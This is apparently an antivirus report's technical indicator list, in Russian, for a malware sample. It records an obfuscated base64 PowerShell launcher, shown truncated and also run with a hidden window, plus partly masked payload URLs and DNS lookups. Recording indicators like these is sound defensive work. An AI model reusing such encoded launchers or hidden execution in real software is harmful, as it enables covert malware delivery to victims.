Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAbABmAHkAZgA4AD0AKAAnAFAAZgAnACsAJwA2AGwAOAB2ACcAKwAnAHoAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBuAHYAOgB0AEUAbQBwAFwAbwBmAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
- http://gu##any.net/zefiro/gSI5r781/
- http://be####roup.com.au/3GrPP0533/
- DNS ASK ja#####lonefabrics.com
- DNS ASK in##yog.com
- DNS ASK 88###liu.com
- DNS ASK gu##any.net
- DNS ASK th####studio.com
- DNS ASK be####roup.com.au
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAbABmAHkAZgA4AD0AKAAnAFAAZgAnACsAJwA2AGwAOAB2ACcAKwAnAHoAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBuAHYAOgB0AEUAbQBwAFwAbwBmAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)